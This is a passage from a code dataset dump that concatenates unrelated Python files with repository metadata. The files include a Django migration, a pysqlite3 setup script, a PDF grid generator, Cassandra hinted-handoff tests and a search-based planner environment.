f"topology_response_body={self.topology_response_body}"
) if self.topology_response_body is not None else None
return f"<SurveyResponseBody {[', '.join(out)]}>"
| 32.373494
| 80
| 0.668031
| 2,330
| 0.867138
| 0
| 0
| 2,344
| 0.872348
| 0
| 0
| 542
| 0.201712
|
65b9bd2ad1163a0006a5a233a9d9d9cd5e6a3646
| 763
|
py
|
Python
|
poll/migrations/0002_auto_20210114_2215.py
|
slk007/SahiGalat.com
|
786688e07237f3554187b90e01149225efaa1713
|
[
"MIT"
] | null | null | null |
poll/migrations/0002_auto_20210114_2215.py
|
slk007/SahiGalat.com
|
786688e07237f3554187b90e01149225efaa1713
|
[
"MIT"
] | null | null | null |
poll/migrations/0002_auto_20210114_2215.py
|
slk007/SahiGalat.com
|
786688e07237f3554187b90e01149225efaa1713
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.1.5 on 2021-01-14 22:15
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('poll', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Topic',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('topic_name', models.CharField(max_length=50)),
('topic_descrption', models.CharField(max_length=255)),
],
),
migrations.AddField(
model_name='question',
name='topics',
field=models.ManyToManyField(related_name='questions', to='poll.Topic'),
),
]
| 28.259259
| 114
| 0.571429
| 670
| 0.878113
| 0
| 0
| 0
| 0
| 0
| 0
| 153
| 0.200524
|
65b9efe5fd413429042a21c46095ea299b352b7a
| 370
|
py
|
Python
|
Leetcode/Python/_1493.py
|
Xrenya/algorithms
|
aded82cacde2f4f2114241907861251e0e2e5638
|
[
"MIT"
] | null | null | null |
Leetcode/Python/_1493.py
|
Xrenya/algorithms
|
aded82cacde2f4f2114241907861251e0e2e5638
|
[
"MIT"
] | null | null | null |
Leetcode/Python/_1493.py
|
Xrenya/algorithms
|
aded82cacde2f4f2114241907861251e0e2e5638
|
[
"MIT"
] | null | null | null |
class Solution:
def longestSubarray(self, nums: List[int]) -> int:
k = 1
max_len, i = 0, 0
for j in range(len(nums)):
if nums[j] == 0:
k -= 1
if k < 0:
if nums[i] == 0:
k += 1
i += 1
max_len = max(max_len, j - i)
return max_len
| 23.125
| 54
| 0.37027
| 369
| 0.997297
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
65bb496751451a7bd133a1ac2b24c5b70ac17431
| 5,375
|
py
|
Python
|
setup.py
|
JakaKokosar/pysqlite3-binary
|
808e9689c69b1ada784eda3d5a8ea7865c8318ad
|
[
"Zlib"
] | null | null | null |
setup.py
|
JakaKokosar/pysqlite3-binary
|
808e9689c69b1ada784eda3d5a8ea7865c8318ad
|
[
"Zlib"
] | null | null | null |
setup.py
|
JakaKokosar/pysqlite3-binary
|
808e9689c69b1ada784eda3d5a8ea7865c8318ad
|
[
"Zlib"
] | null | null | null |
# -*- coding: ISO-8859-1 -*-
# setup.py: the distutils script
#
import os
import setuptools
import sys
from distutils import log
from distutils.command.build_ext import build_ext
from setuptools import Extension
# If you need to change anything, it should be enough to change setup.cfg.
PACKAGE_NAME = 'pysqlite3'
VERSION = '0.4.1'
# define sqlite sources
sources = [os.path.join('src', source)
for source in ["module.c", "connection.c", "cursor.c", "cache.c",
"microprotocols.c", "prepare_protocol.c",
"statement.c", "util.c", "row.c", "blob.c"]]
# define packages
packages = [PACKAGE_NAME]
EXTENSION_MODULE_NAME = "._sqlite3"
# Work around clang raising hard error for unused arguments
if sys.platform == "darwin":
os.environ['CFLAGS'] = "-Qunused-arguments"
log.info("CFLAGS: " + os.environ['CFLAGS'])
def quote_argument(arg):
quote = '"' if sys.platform != 'win32' else '\\"'
return quote + arg + quote
define_macros = [('MODULE_NAME', quote_argument(PACKAGE_NAME + '.dbapi2'))]
class SystemLibSqliteBuilder(build_ext):
description = "Builds a C extension linking against libsqlite3 library"
def build_extension(self, ext):
log.info(self.description)
# For some reason, when setup.py develop is run, it ignores the
# configuration in setup.cfg, so we just explicitly add libsqlite3.
# Oddly, running setup.py build_ext -i (for in-place) works fine and
# correctly reads the setup.cfg.
ext.libraries.append('sqlite3')
build_ext.build_extension(self, ext)
class AmalgationLibSqliteBuilder(build_ext):
description = "Builds a C extension using a sqlite3 amalgamation"
amalgamation_root = "."
amalgamation_header = os.path.join(amalgamation_root, 'sqlite3.h')
amalgamation_source = os.path.join(amalgamation_root, 'sqlite3.c')
amalgamation_message = ('Sqlite amalgamation not found. Please download '
'or build the amalgamation and make sure the '
'following files are present in the pysqlite3 '
'folder: sqlite3.h, sqlite3.c')
def check_amalgamation(self):
if not os.path.exists(self.amalgamation_root):
os.mkdir(self.amalgamation_root)
header_exists = os.path.exists(self.amalgamation_header)
source_exists = os.path.exists(self.amalgamation_source)
if not header_exists or not source_exists:
raise RuntimeError(self.amalgamation_message)
def build_extension(self, ext):
log.info(self.description)
# it is responsibility of user to provide amalgamation
self.check_amalgamation()
# Feature-ful library.
features = (
'ALLOW_COVERING_INDEX_SCAN',
'ENABLE_FTS3',
'ENABLE_FTS3_PARENTHESIS',
'ENABLE_FTS4',
'ENABLE_FTS5',
'ENABLE_JSON1',
'ENABLE_LOAD_EXTENSION',
'ENABLE_RTREE',
'ENABLE_STAT4',
'ENABLE_UPDATE_DELETE_LIMIT',
'SOUNDEX',
'USE_URI',
)
for feature in features:
ext.define_macros.append(('SQLITE_%s' % feature, '1'))
# Always use memory for temp store.
ext.define_macros.append(("SQLITE_TEMP_STORE", "3"))
ext.include_dirs.append(self.amalgamation_root)
ext.sources.append(os.path.join(self.amalgamation_root, "sqlite3.c"))
if sys.platform != "win32":
# Include math library, required for fts5.
ext.extra_link_args.append("-lm")
build_ext.build_extension(self, ext)
def __setattr__(self, k, v):
# Make sure we don't link against the SQLite
# library, no matter what setup.cfg says
if k == "libraries":
v = None
self.__dict__[k] = v
def get_setup_args():
return dict(
name=PACKAGE_NAME,
version=VERSION,
description="DB-API 2.0 interface for Sqlite 3.x",
long_description='',
author="Charles Leifer",
author_email="coleifer@gmail.com",
license="zlib/libpng",
platforms="ALL",
url="https://github.com/coleifer/pysqlite3",
package_dir={PACKAGE_NAME: "pysqlite3"},
packages=packages,
ext_modules=[Extension(
name=PACKAGE_NAME + EXTENSION_MODULE_NAME,
sources=sources,
define_macros=define_macros)
],
classifiers=[
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"License :: OSI Approved :: zlib/libpng License",
"Operating System :: MacOS :: MacOS X",
"Operating System :: Microsoft :: Windows",
"Operating System :: POSIX",
"Programming Language :: C",
"Programming Language :: Python",
"Topic :: Database :: Database Engines/Servers",
"Topic :: Software Development :: Libraries :: Python Modules"],
cmdclass={
"build_static": AmalgationLibSqliteBuilder,
"build_ext": SystemLibSqliteBuilder
}
)
def main():
try:
setuptools.setup(**get_setup_args())
except BaseException as ex:
log.info(str(ex))
if __name__ == "__main__":
main()
| 32.97546
| 77
| 0.618233
| 2,833
| 0.52707
| 0
| 0
| 0
| 0
| 0
| 0
| 2,095
| 0.389767
|
65bc3f6e1793bcf43d99a8c4a348a352385aa4a0
| 5,267
|
py
|
Python
|
gridder/gridder.py
|
PDFGridder/PDFGridder
|
94bc6e76eadc3799905c905a70228fcd6b30c4fb
|
[
"MIT"
] | 2
|
2016-09-07T18:32:44.000Z
|
2016-11-24T19:45:06.000Z
|
gridder/gridder.py
|
PDFGridder/PDFGridder
|
94bc6e76eadc3799905c905a70228fcd6b30c4fb
|
[
"MIT"
] | null | null | null |
gridder/gridder.py
|
PDFGridder/PDFGridder
|
94bc6e76eadc3799905c905a70228fcd6b30c4fb
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python
import cairo
from .utils import hex_to_rgba, parse_unit
def parse_size(size):
"""take a size as str (es: 14px), return its value in px/pt as int
"""
if hasattr(size, 'isdigit'):
if size.isdigit():
return int(size)
return parse_unit(size[:-2], size[-2:])
return size
def parse_size_shorthand(shorthand):
tokens = shorthand.split()
l = len(tokens)
if l == 1:
return {'top': parse_size(tokens[0]), 'right': parse_size(tokens[0]), 'bottom': parse_size(tokens[0]), 'left': parse_size(tokens[0])}
if l == 2:
return {'top': parse_size(tokens[0]), 'right': parse_size(tokens[1]), 'bottom': parse_size(tokens[0]), 'left': parse_size(tokens[1])}
return {'top': parse_size(tokens[0]), 'right': parse_size(tokens[1]), 'bottom': parse_size(tokens[2]), 'left': parse_size(tokens[3])}
def hex_to_cairo(value, alpha=1.0):
value = hex_to_rgba(value, alpha)
rgb = [v / 255.0 for v in value[:3]]
rgb.append(value[-1])
return tuple(rgb)
class PDFGridder(object):
def __init__(self, grid):
self.grid = grid
self.paper = {
'width': str(grid.width) + grid.width_unit,
'height': str(grid.height) + grid.height_unit,
}
self.columns = {
'count': grid.columns,
'color': grid.columns_color,
'opacity': grid.columns_opacity,
'gutter': grid.columns_gutter_str()
}
self.baseline = {
'distance': str(grid.baseline) + grid.baseline_unit,
'color': grid.baseline_color,
'opacity': grid.baseline_opacity,
}
self.margin = grid.margins()
self.margin_size = parse_size_shorthand(self.margin)
self.is_spread = grid.is_spread
self.rows = {
'count': 0,
'gutter': 0,
'color': '#ccc',
'opacity': 0.5
}
def draw_cols(self, bottom, w):
cols = self.columns['count']
if cols > 0:
cols_gutter_size = parse_size(self.columns['gutter'])
cols_width = (w / cols) - cols_gutter_size + (cols_gutter_size / cols) - (self.margin_size['left'] / cols) - (self.margin_size['right'] / cols)
cols_offset = cols_width + cols_gutter_size
cols_color = hex_to_cairo(self.columns['color'], self.columns['opacity'])
for i in xrange(cols):
self.ctx.rectangle(i * cols_offset + self.margin_size['left'], 0, cols_width, bottom)
self.ctx.set_source_rgba(*cols_color) # Solid color
self.ctx.fill()
def draw_rows(self, rows, h):
#rows
rows_count = rows['count']
if rows_count:
rows_gutter_size = parse_size(rows['gutter'])
rows_color = hex_to_cairo(rows['color'], rows['opacity'])
rows_height = (h / rows_count) - rows_gutter_size + (rows_gutter_size / rows_count) - (self.margin_size['top'] / rows_count) - (self.margin_size['bottom'] / rows_count)
rows_offset = rows_height + rows_gutter_size
for i in xrange(rows_count):
self.ctx.rectangle(
self.margin_size['left'],
i * rows_offset,
rows_height,
self.margin_size['right']
)
self.ctx.set_source_rgba(*rows_color) # Solid color
self.ctx.fill()
def draw_baselines(self, distance, w, bottom, lines_color):
base_offset = distance
while base_offset < bottom:
self.ctx.move_to(self.margin_size['left'], base_offset)
self.ctx.line_to(w - self.margin_size['right'], base_offset)
base_offset = base_offset + distance
self.ctx.set_source_rgba(*lines_color) # Solid color
self.ctx.set_line_width(0.25)
self.ctx.stroke()
def build_page(self, surface, h_flip=False):
w, h = parse_size(self.paper['width']), parse_size(self.paper['height'])
if h_flip:
self.margin_size['left'], self.margin_size['right'] = self.margin_size['right'], self.margin_size['left']
self.ctx = cairo.Context(surface)
#ctx.scale (w/1.0, h/1.0) # Normalizing the canvas
self.ctx.translate(0, self.margin_size['top'])
bottom = h - self.margin_size['bottom'] - self.margin_size['top']
self.draw_cols(bottom, w)
self.draw_rows(self.rows, h)
#baseline
try:
lines_color = hex_to_cairo(self.baseline['color'], self.baseline['opacity'])
except ValueError:
lines_color = None
distance = parse_size(self.baseline['distance'])
if distance > 0 and lines_color is not None:
self.draw_baselines(distance, w, bottom, lines_color)
return self.ctx
def build(self, output='output.pdf'):
w, h = parse_size(self.paper['width']), parse_size(self.paper['height'])
surface = cairo.PDFSurface(output, w, h)
self.build_page(surface=surface)
surface.show_page()
if self.is_spread:
self.build_page(surface=surface, h_flip=True)
surface.show_page()
surface.finish()
return output
| 36.324138
| 180
| 0.58838
| 4,221
| 0.801405
| 0
| 0
| 0
| 0
| 0
| 0
| 626
| 0.118853
|
65bc5bc0726d3703c47b9225540efbf4baf75f28
| 462
|
py
|
Python
|
wanikani_api/constants.py
|
peraperacafe/wanikani_api
|
7340fde25ef4b102545e4fa2c485339d79136e17
|
[
"BSD-3-Clause"
] | 12
|
2019-04-30T13:11:52.000Z
|
2021-05-14T02:52:05.000Z
|
wanikani_api/constants.py
|
peraperacafe/wanikani_api
|
7340fde25ef4b102545e4fa2c485339d79136e17
|
[
"BSD-3-Clause"
] | 323
|
2018-07-13T00:39:22.000Z
|
2022-03-31T19:29:08.000Z
|
wanikani_api/constants.py
|
peraperacafe/wanikani_api
|
7340fde25ef4b102545e4fa2c485339d79136e17
|
[
"BSD-3-Clause"
] | 9
|
2020-02-14T14:56:00.000Z
|
2022-01-09T19:14:07.000Z
|
ROOT_WK_API_URL = "https://api.wanikani.com/v2/"
RESOURCES_WITHOUT_IDS = ["user", "collection", "report"]
SUBJECT_ENDPOINT = "subjects"
SINGLE_SUBJECT_ENPOINT = r"subjects/\d+"
ASSIGNMENT_ENDPOINT = "assignments"
REVIEW_STATS_ENDPOINT = "review_statistics"
STUDY_MATERIALS_ENDPOINT = "study_materials"
REVIEWS_ENDPOINT = "reviews"
LEVEL_PROGRESSIONS_ENDPOINT = "level_progressions"
RESETS_ENDPOINT = "resets"
SUMMARY_ENDPOINT = "summary"
USER_ENDPOINT = "user"
| 33
| 56
| 0.798701
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 182
| 0.393939
|
65bd680ebf2391800df849001a9518d85eba50ba
| 1,943
|
py
|
Python
|
utils/dataloader.py
|
Jiaqi0602/adversarial-attack-from-leakage
|
90db721bed10094ac7d458b232ad5b1573884338
|
[
"BSD-3-Clause"
] | 9
|
2021-06-17T00:46:19.000Z
|
2022-03-05T13:57:38.000Z
|
utils/dataloader.py
|
Jiaqi0602/adversarial-attack-from-leakage
|
90db721bed10094ac7d458b232ad5b1573884338
|
[
"BSD-3-Clause"
] | null | null | null |
utils/dataloader.py
|
Jiaqi0602/adversarial-attack-from-leakage
|
90db721bed10094ac7d458b232ad5b1573884338
|
[
"BSD-3-Clause"
] | null | null | null |
from inversefed import consts
import torch
from torchvision import datasets, transforms
class DataLoader:
def __init__(self, data, device):
self.data = data
self.device = device
def get_mean_std(self):
if self.data == 'cifar10':
mean, std = consts.cifar10_mean, consts.cifar10_std
elif self.data == 'cifar100':
mean, std = consts.cifar100_mean, consts.cifar100_std
elif self.data == 'mnist':
mean, std = consts.mnist_mean, consts.mnist_std
elif self.data == 'imagenet':
mean, std = consts.imagenet_mean, consts.imagenet_std
else:
raise Exception("dataset not found")
return mean, std
def get_data_info(self):
mean, std = self.get_mean_std()
transform = transforms.Compose([transforms.ToTensor(),
transforms.Normalize(mean, std)])
dm = torch.as_tensor(mean)[:, None, None].to(self.device)
ds = torch.as_tensor(std)[:, None, None].to(self.device)
data_root = 'data/cifar_data'
# data_root = '~/.torch'
if self.data == 'cifar10':
dataset = datasets.CIFAR10(root=data_root, download=True, train=False, transform=transform)
elif self.data == 'cifar100':
dataset = datasets.CIFAR100(root=data_root, download=True, train=False, transform=transform)
elif self.data == 'mnist':
dataset = datasets.MNIST(root=data_root, download=True, train=False, transform=transform)
elif self.data == 'imagenet':
dataset = datasets.ImageNet(root=data_root, download=True, train=False, transform=transform)
else:
raise Exception("dataset not found, load your own datasets")
data_shape = dataset[0][0].shape
classes = dataset.classes
return dataset, data_shape, classes, (dm, ds)
| 39.653061
| 104
| 0.609882
| 1,846
| 0.950077
| 0
| 0
| 0
| 0
| 0
| 0
| 183
| 0.094184
|
65be1830984a29d7acd4c26b6de2aa0995caf8fb
| 10,651
|
py
|
Python
|
hintedhandoff_test.py
|
Ankou76ers/cassandra-dtest
|
54f5a983738a1580fbbe43bdb7201ff9b2664401
|
[
"Apache-2.0"
] | 44
|
2017-07-13T14:20:42.000Z
|
2022-03-27T23:55:27.000Z
|
hintedhandoff_test.py
|
Ankou76ers/cassandra-dtest
|
54f5a983738a1580fbbe43bdb7201ff9b2664401
|
[
"Apache-2.0"
] | 64
|
2017-07-26T16:06:01.000Z
|
2022-03-17T22:57:03.000Z
|
hintedhandoff_test.py
|
Ankou76ers/cassandra-dtest
|
54f5a983738a1580fbbe43bdb7201ff9b2664401
|
[
"Apache-2.0"
] | 105
|
2017-07-13T14:28:14.000Z
|
2022-03-23T04:22:46.000Z
|
import os
import time
import pytest
import logging
from cassandra import ConsistencyLevel
from dtest import Tester, create_ks
from tools.data import create_c1c2_table, insert_c1c2, query_c1c2
from tools.assertions import assert_stderr_clean
since = pytest.mark.since
ported_to_in_jvm = pytest.mark.ported_to_in_jvm
logger = logging.getLogger(__name__)
@since('3.0')
class TestHintedHandoffConfig(Tester):
"""
Tests the hinted handoff configuration options introduced in
CASSANDRA-9035.
@jira_ticket CASSANDRA-9035
"""
def _start_two_node_cluster(self, config_options=None):
"""
Start a cluster with two nodes and return them
"""
cluster = self.cluster
if config_options:
cluster.set_configuration_options(values=config_options)
cluster.populate([2]).start()
return cluster.nodelist()
def _launch_nodetool_cmd(self, node, cmd):
"""
Launch a nodetool command and check there is no error, return the result
"""
out, err, _ = node.nodetool(cmd)
assert_stderr_clean(err)
return out
def _do_hinted_handoff(self, node1, node2, enabled, keyspace='ks'):
"""
Test that if we stop one node the other one
will store hints only when hinted handoff is enabled
"""
session = self.patient_exclusive_cql_connection(node1)
create_ks(session, keyspace, 2)
create_c1c2_table(self, session)
node2.stop(wait_other_notice=True)
insert_c1c2(session, n=100, consistency=ConsistencyLevel.ONE)
log_mark = node1.mark_log()
node2.start()
if enabled:
node1.watch_log_for(["Finished hinted"], from_mark=log_mark, timeout=120)
node1.stop(wait_other_notice=True)
# Check node2 for all the keys that should have been delivered via HH if enabled or not if not enabled
session = self.patient_exclusive_cql_connection(node2, keyspace=keyspace)
for n in range(0, 100):
if enabled:
query_c1c2(session, n, ConsistencyLevel.ONE)
else:
query_c1c2(session, n, ConsistencyLevel.ONE, tolerate_missing=True, must_be_missing=True)
@ported_to_in_jvm('4.0')
def test_nodetool(self):
"""
Test various nodetool commands
"""
node1, node2 = self._start_two_node_cluster({'hinted_handoff_enabled': True})
for node in node1, node2:
res = self._launch_nodetool_cmd(node, 'statushandoff')
assert 'Hinted handoff is running' == res.rstrip()
self._launch_nodetool_cmd(node, 'disablehandoff')
res = self._launch_nodetool_cmd(node, 'statushandoff')
assert 'Hinted handoff is not running' == res.rstrip()
self._launch_nodetool_cmd(node, 'enablehandoff')
res = self._launch_nodetool_cmd(node, 'statushandoff')
assert 'Hinted handoff is running' == res.rstrip()
self._launch_nodetool_cmd(node, 'disablehintsfordc dc1')
res = self._launch_nodetool_cmd(node, 'statushandoff')
assert 'Hinted handoff is running{}Data center dc1 is disabled'.format(os.linesep) == res.rstrip()
self._launch_nodetool_cmd(node, 'enablehintsfordc dc1')
res = self._launch_nodetool_cmd(node, 'statushandoff')
assert 'Hinted handoff is running' == res.rstrip()
def test_hintedhandoff_disabled(self):
"""
Test gloabl hinted handoff disabled
"""
node1, node2 = self._start_two_node_cluster({'hinted_handoff_enabled': False})
for node in node1, node2:
res = self._launch_nodetool_cmd(node, 'statushandoff')
assert 'Hinted handoff is not running' == res.rstrip()
self._do_hinted_handoff(node1, node2, False)
def test_hintedhandoff_enabled(self):
"""
Test global hinted handoff enabled
"""
node1, node2 = self._start_two_node_cluster({'hinted_handoff_enabled': True})
for node in node1, node2:
res = self._launch_nodetool_cmd(node, 'statushandoff')
assert 'Hinted handoff is running' == res.rstrip()
self._do_hinted_handoff(node1, node2, True)
@since('4.0')
def test_hintedhandoff_setmaxwindow(self):
"""
Test global hinted handoff against max_hint_window_in_ms update via nodetool
"""
node1, node2 = self._start_two_node_cluster({'hinted_handoff_enabled': True, "max_hint_window_in_ms": 300000})
for node in node1, node2:
res = self._launch_nodetool_cmd(node, 'statushandoff')
assert 'Hinted handoff is running' == res.rstrip()
res = self._launch_nodetool_cmd(node, 'getmaxhintwindow')
assert 'Current max hint window: 300000 ms' == res.rstrip()
self._do_hinted_handoff(node1, node2, True)
node1.start()
for node in node1, node2:
# Make sure HH is effective on both nodes despite node startup races CASSANDRA-15865
self._launch_nodetool_cmd(node, 'setmaxhintwindow 1')
res = self._launch_nodetool_cmd(node, 'getmaxhintwindow')
assert 'Current max hint window: 1 ms' == res.rstrip()
self._do_hinted_handoff(node1, node2, False, keyspace='ks2')
def test_hintedhandoff_dc_disabled(self):
"""
Test global hinted handoff enabled with the dc disabled
"""
node1, node2 = self._start_two_node_cluster({'hinted_handoff_enabled': True,
'hinted_handoff_disabled_datacenters': ['dc1']})
for node in node1, node2:
res = self._launch_nodetool_cmd(node, 'statushandoff')
assert 'Hinted handoff is running{}Data center dc1 is disabled'.format(os.linesep) == res.rstrip()
self._do_hinted_handoff(node1, node2, False)
def test_hintedhandoff_dc_reenabled(self):
"""
Test global hinted handoff enabled with the dc disabled first and then re-enabled
"""
node1, node2 = self._start_two_node_cluster({'hinted_handoff_enabled': True,
'hinted_handoff_disabled_datacenters': ['dc1']})
for node in node1, node2:
res = self._launch_nodetool_cmd(node, 'statushandoff')
assert 'Hinted handoff is running{}Data center dc1 is disabled'.format(os.linesep) == res.rstrip()
for node in node1, node2:
self._launch_nodetool_cmd(node, 'enablehintsfordc dc1')
res = self._launch_nodetool_cmd(node, 'statushandoff')
assert 'Hinted handoff is running' == res.rstrip()
self._do_hinted_handoff(node1, node2, True)
class TestHintedHandoff(Tester):
@ported_to_in_jvm('4.0')
@pytest.mark.no_vnodes
def test_hintedhandoff_decom(self):
self.cluster.populate(4).start()
[node1, node2, node3, node4] = self.cluster.nodelist()
session = self.patient_cql_connection(node1)
create_ks(session, 'ks', 2)
create_c1c2_table(self, session)
node4.stop(wait_other_notice=True)
insert_c1c2(session, n=100, consistency=ConsistencyLevel.ONE)
node1.decommission()
node4.start(wait_for_binary_proto=True)
force = True if self.cluster.version() >= '3.12' else False
node2.decommission(force=force)
node3.decommission(force=force)
time.sleep(5)
for x in range(0, 100):
query_c1c2(session, x, ConsistencyLevel.ONE)
@since('4.1')
def test_hintedhandoff_window(self):
"""
Test that we only store at a maximum the hint window worth of hints.
Prior to CASSANDRA-14309 we would store another window worth of hints
if the down node was brought up and then taken back down immediately.
We would also store another window of hints on a live node if the live
node was restarted.
@jira_ticket CASSANDRA-14309
"""
# hint_window_persistent_enabled is set to true by default
self.cluster.set_configuration_options({'max_hint_window_in_ms': 5000,
'hinted_handoff_enabled': True,
'max_hints_delivery_threads': 1,
'hints_flush_period_in_ms': 100, })
self.cluster.populate(2).start()
node1, node2 = self.cluster.nodelist()
session = self.patient_cql_connection(node1)
create_ks(session, 'ks', 2)
create_c1c2_table(self, session)
# Stop handoff until very end and take node2 down for first round of hints
node1.nodetool('pausehandoff')
node2.nodetool('disablebinary')
node2.nodetool('disablegossip')
# First round of hints. We expect these to be replayed and the only
# hints within the window
insert_c1c2(session, n=(0, 100), consistency=ConsistencyLevel.ONE)
# Let hint window pass
time.sleep(10)
# Re-enable and disable the node. Prior to CASSANDRA-14215 this should make the hint window on node1 reset.
node2.nodetool('enablegossip')
node2.nodetool('disablegossip')
# Second round of inserts. We do not expect hints to be stored.
insert_c1c2(session, n=(100, 200), consistency=ConsistencyLevel.ONE)
# Restart node1. Prior to CASSANDRA-14215 this would reset node1's hint window.
node1.stop()
node1.start(wait_for_binary_proto=True, wait_other_notice=False)
session = self.patient_exclusive_cql_connection(node1)
session.execute('USE ks')
# Third round of inserts. We do not expect hints to be stored.
insert_c1c2(session, n=(200, 300), consistency=ConsistencyLevel.ONE)
# Enable node2 and wait for hints to be replayed
node2.nodetool('enablegossip')
node2.nodetool('enablebinary')
node1.nodetool('resumehandoff')
node1.watch_log_for('Finished hinted handoff')
# Stop node1 so that we only query node2
node1.stop()
session = self.patient_exclusive_cql_connection(node2)
session.execute('USE ks')
# Ensure first dataset is present (through replayed hints)
for x in range(0, 100):
query_c1c2(session, x, ConsistencyLevel.ONE)
# Ensure second and third datasets are not present
for x in range(100, 300):
query_c1c2(session, x, ConsistencyLevel.ONE, tolerate_missing=True, must_be_missing=True)
| 40.192453
| 118
| 0.648202
| 10,276
| 0.964792
| 0
| 0
| 10,246
| 0.961975
| 0
| 0
| 3,561
| 0.334335
|
65be1ffede01306450a5f34b42845bf53968f1d8
| 248
|
py
|
Python
|
pre_definition/solve_caller.py
|
sr9000/stepik_code_task_baking
|
60a5197f659db1734132eeb9d82624f1b7aaeb3f
|
[
"MIT"
] | null | null | null |
pre_definition/solve_caller.py
|
sr9000/stepik_code_task_baking
|
60a5197f659db1734132eeb9d82624f1b7aaeb3f
|
[
"MIT"
] | null | null | null |
pre_definition/solve_caller.py
|
sr9000/stepik_code_task_baking
|
60a5197f659db1734132eeb9d82624f1b7aaeb3f
|
[
"MIT"
] | null | null | null |
from collections.abc import Iterable as ABCIterable
def call_with_args(func, args):
if isinstance(args, dict):
return func(**args)
elif isinstance(args, ABCIterable):
return func(*args)
else:
return func(args)
| 22.545455
| 51
| 0.665323
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
65bea9d189e5ba73f3c48d6d3eae40bf9da3717b
| 817
|
py
|
Python
|
wikipedia_test.py
|
pedrogengo/TopicBlob
|
e6a7736d39c7a174d0289b21c152cd8bb02f2669
|
[
"Apache-2.0"
] | null | null | null |
wikipedia_test.py
|
pedrogengo/TopicBlob
|
e6a7736d39c7a174d0289b21c152cd8bb02f2669
|
[
"Apache-2.0"
] | null | null | null |
wikipedia_test.py
|
pedrogengo/TopicBlob
|
e6a7736d39c7a174d0289b21c152cd8bb02f2669
|
[
"Apache-2.0"
] | null | null | null |
import wikipedia
from topicblob import TopicBlob
#get random wikipeida summaries
wiki_pages = ["Facebook","New York City","Barack Obama","Wikipedia","Topic Modeling","Python (programming language)","Snapchat"]
wiki_pages = ["Facebook","New York City","Barack Obama"]
texts = []
for page in wiki_pages:
text = wikipedia.summary(page)
#print(text)
texts.append(text)
tb = TopicBlob(texts, 20, 50)
#Do topic search for social
topic_search = tb.search_docs_by_topics("social")
print(topic_search)
print("\n")
#Do a ranked search for president
search = tb.ranked_search_docs_by_words("president")
print(search)
print("\n")
#Find similar text for
print("Finding similar document for\n" + tb.blobs[0]["doc"])
print("\n")
sims = tb.get_sim(0)
for sim in sims.keys():
print(tb.get_doc(sim))
| 18.568182
| 128
| 0.71481
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 340
| 0.416157
|
65c19e6d0f4a645a3e85871f601e50a70618990c
| 215
|
py
|
Python
|
component/model/dmp_model.py
|
12rambau/damage_proxy_maps
|
98a004bf4420c6ce1b7ecd77e426e8fe7d512f52
|
[
"MIT"
] | 1
|
2021-09-01T18:27:19.000Z
|
2021-09-01T18:27:19.000Z
|
component/model/dmp_model.py
|
12rambau/damage_proxy_maps
|
98a004bf4420c6ce1b7ecd77e426e8fe7d512f52
|
[
"MIT"
] | 3
|
2021-06-01T10:15:36.000Z
|
2021-10-07T10:00:16.000Z
|
component/model/dmp_model.py
|
12rambau/damage_proxy_maps
|
98a004bf4420c6ce1b7ecd77e426e8fe7d512f52
|
[
"MIT"
] | 2
|
2021-06-01T10:16:03.000Z
|
2021-06-10T12:43:47.000Z
|
from sepal_ui import model
from traitlets import Any
class DmpModel(model.Model):
# inputs
event = Any(None).tag(sync=True)
username = Any(None).tag(sync=True)
password = Any(None).tag(sync=True)
| 19.545455
| 39
| 0.693023
| 159
| 0.739535
| 0
| 0
| 0
| 0
| 0
| 0
| 8
| 0.037209
|
65c1e68e0dc7466b357152cbb876f5ad24ac99ef
| 9,154
|
py
|
Python
|
SaIL/envs/state_lattice_planner_env.py
|
yonetaniryo/SaIL
|
c7404024c7787184c3638e9730bd185373ed0bf6
|
[
"BSD-3-Clause"
] | 12
|
2018-05-18T19:29:09.000Z
|
2020-05-15T13:47:12.000Z
|
SaIL/envs/state_lattice_planner_env.py
|
yonetaniryo/SaIL
|
c7404024c7787184c3638e9730bd185373ed0bf6
|
[
"BSD-3-Clause"
] | 1
|
2018-05-18T19:36:42.000Z
|
2018-07-20T03:03:13.000Z
|
SaIL/envs/state_lattice_planner_env.py
|
yonetaniryo/SaIL
|
c7404024c7787184c3638e9730bd185373ed0bf6
|
[
"BSD-3-Clause"
] | 10
|
2018-01-11T21:23:40.000Z
|
2021-11-10T04:38:07.000Z
|
#!/usr/bin/env python
"""An environment that takes as input databases of environments and runs episodes,
where each episode is a search based planner. It then returns the average number of expansions,
and features (if training)
Author: Mohak Bhardwaj
"""
from collections import defaultdict
import numpy as np
import os
from SaIL.learners.supervised_regression_network import SupervisedRegressionNetwork
from planning_python.data_structures.priority_queue import PriorityQueue
from planning_python.planners.search_based_planner import SearchBasedPlanner
from planning_python.environment_interface.env_2d import Env2D
from planning_python.state_lattices.common_lattice.xy_analytic_lattice import XYAnalyticLattice
from planning_python.state_lattices.common_lattice.xyh_analytic_lattice import XYHAnalyticLattice
from planning_python.cost_functions.cost_function import PathLengthNoAng, DubinsPathLength
from planning_python.heuristic_functions.heuristic_function import EuclideanHeuristicNoAng, ManhattanHeuristicNoAng, DubinsHeuristic
from planning_python.data_structures.planning_problem import PlanningProblem
class StateLatticePlannerEnv(SearchBasedPlanner):
def __init__(self, env_params, lattice_type, lattice_params, cost_fn, learner_params):
self.env_params = env_params
self.cost_fn = cost_fn
self.lattice_type = lattice_type
if lattice_type == "XY":
self.lattice = XYAnalyticLattice(lattice_params)
self.start_n = self.lattice.state_to_node((lattice_params['x_lims'][0], lattice_params['y_lims'][0]))
self.goal_n = self.lattice.state_to_node((lattice_params['x_lims'][1]-1, lattice_params['y_lims'][0]-1))
elif lattice_type == "XYH":
self.lattice = XYHAnalyticLattice(lattice_params)
self.start_n = self.lattice.state_to_node((lattice_params['x_lims'][0], lattice_params['y_lims'][0], 0))
self.goal_n = self.lattice.state_to_node((lattice_params['x_lims'][1]-1, lattice_params['y_lims'][0]-1, 0))
self.lattice.precalc_costs(self.cost_fn) #Enumerate and cache successors and edge costs
